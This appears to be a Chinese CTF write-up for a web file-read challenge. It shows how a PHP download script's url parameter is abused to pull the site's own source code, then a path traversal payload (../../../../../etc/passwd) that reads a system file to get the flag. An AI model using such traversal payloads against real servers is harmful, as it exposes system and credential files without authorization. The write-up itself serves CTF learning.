云演-Web文件读取-writeup

文件读取


题目主页面是一个下载附件的链接,然而附件里面什么都没有,通过构造

download.php?url=download.php

下载得到download.php

<?php
include_once ('download.class.php');
$filename = $_GET['url'];
$file = new Down();
$downfile = $file -> downfile($filename);
?>

感觉有点像一个反序列化题,下载download.class.php

download.php?url=download.class.php
<?php

class Down
{
	function downfile($file){

		//First, see if the file exists
//		if (!is_file($file)) { die("<b>404 File not found!</b>"); }

		//Gather relevent info about file
	//	$len = filesize($file);
		$filename = basename($file);
		$file_extension = strtolower(substr(strrchr($filename,"."),1));

		//This will set the Content-Type to the appropriate setting for the file
		switch( $file_extension ) {
			case "pdf": $ctype="application/pdf"; break;
		  	case "exe": $ctype="application/octet-stream"; break;
		  	case "zip": $ctype="application/zip"; break;
		  	case "doc": $ctype="application/msword"; break;
		  	case "xls": $ctype="application/vnd.ms-excel"; break;
		  	case "ppt": $ctype="application/vnd.ms-powerpoint"; break;
		  	case "gif": $ctype="image/gif"; break;
		  	case "png": $ctype="image/png"; break;
		  	case "jpeg":
		  	case "jpg": $ctype="image/jpg"; break;
		  	case "mp3": $ctype="audio/mpeg"; break;
		  	case "wav": $ctype="audio/x-wav"; break;
		  	case "mpeg":
		  	case "mpg":
		  	case "mpe": $ctype="video/mpeg"; break;
		  	case "mov": $ctype="video/quicktime"; break;
		  	case "avi": $ctype="video/x-msvideo"; break;

		  //The following are for extensions that shouldn't be downloaded (sensitive stuff, like php files)
		  //case "php":
		  //case "htm":
		  //case "html":
		  case "txt": die("<b>Cannot be used for ". $file_extension ." files!</b>"); break;

		//  default: $ctype="application/force-download";
		}

		//Begin writing headers
		/*header("Pragma: public");
		header("Expires: 0");
		header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
		header("Cache-Control: public"); 
		header("Content-Description: File Transfer");
		*/
		//Use the switch-generated Content-Type
		header("Content-Type: $ctype");

		//Force the download
		$header="Content-Disposition: attachment; filename=".$filename.";";
		header($header );
		//header("Content-Transfer-Encoding: binary");
	//	header("Content-Length: ".$len);
		@readfile($file);
		exit;
	}
}
?>

然并卵,没什么用,只是发现一个@readfile($file);,然后想着去读取一下/etc/passwd,一个一个路径的试,最后的payload为

download.php?url=../../../../../etc/passwd

得到flag

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值